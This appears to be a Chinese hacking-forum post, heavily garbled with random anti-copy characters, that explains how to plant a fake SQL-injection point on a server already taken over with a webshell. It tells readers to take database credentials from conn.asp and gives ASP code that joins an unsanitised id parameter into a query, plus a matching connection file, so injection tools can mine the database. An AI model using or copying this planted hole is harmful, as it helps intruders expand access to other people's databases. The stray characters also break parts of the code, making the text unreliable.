自己构造注入点方便入侵
( @ n8 v0 i! d' y2 K
0 p; U8 Q: k1 r V今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息* [/ z, h8 X$ K/ P- T2 ~$ c% D
5 C- V6 {9 x9 T6 h. z Y# A这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!
1 ?; E$ n0 b- T) r. P
3 V' N# @ D1 u! T首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和+ o7 c" K0 f4 C3 e+ J' O4 c
) n" _0 H! }; V1 }5 f) ?4 |; A% U密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表$ I1 I" W A& t7 [+ {
9 ` ?$ \8 [3 L6 g
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
$ S J. |! ^ h0 j6 p ]: X5 P& i. A& Z
程序代码
# l T" d2 ]& s. ^) M<!--#include file="xx.asp"-->
( R4 s1 \7 `( u- m8 {; [3 ^! T$ \<%
5 H! n, E" R: K! \& Cset rs=server.createobject("ADODB.recordset")
6 D' }" z! t! {: }8 x6 m4 X) [id = request("id") T; b+ |" J" x& t, i \
strSQL = "select * from admin where id=" & id r ?2 J0 p, k" n7 ?0 H, d- Z
rs.open strSQL,conn,1,3: a7 _" k. t$ s4 R. Z+ q; B
rs.close- o( A* C8 W! v
%>
: S! |9 M! l) k6 U( v" |2 ^) l7 y, i p: R
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在) F* s' L3 B- D3 j6 c5 ^3 {$ ^
( v0 ]8 n( C+ k: g- I
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!& h3 i6 C" s4 I" \* e
: S# R; t, S& [7 \( r: V然后就要构造一个连接数据库的文件了,代码如下:) q/ g( U( E1 S; B) Y4 a( o' Z! w$ K
程序代码
& [# Z. H+ g" o7 i8 H7 O3 \<% / _7 z1 v6 R. n5 w o5 B& `
strSQLServerName = "000.000.000.000" '服务器名称或地址
\1 ?1 n m- u- H: y" `8 YstrSQLDBUserName = "sqlname" '数据库帐号
( W' [! r( y: O9 ?- T, |# c6 istrSQLDBPassword = "sqlpass" '数据库密码; Y7 g) I9 k: f3 g8 m" d5 C
strSQLDBName = "sqldataname" '数据库名称0 L, S- D( B' A8 v/ L
Set conn = Server.CreateObject("ADODB.Connection")
$ Y( U+ x! A4 ~strCon = " rovider=SQLOLEDB.1 ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & " assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"+ T2 s. I' M; P7 j
conn.open strCon5 Q. ]& y% R% h6 Z" u2 U0 q; \1 r
%>
/ \9 A" K3 H& F$ N. r+ Z) B. r8 {: D( q# B8 E# W# k; m4 S
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
- x5 j _/ E* y$ b3 I7 B
! l4 `: z1 a8 m3 y# I! s就这样,正常情况下,就OK了,伪造成功……
! a% V: J* b& z" A- B
$ Z/ c" x) l4 K% c) u 如果有什么问题可以提出来大家一起探讨解决。 |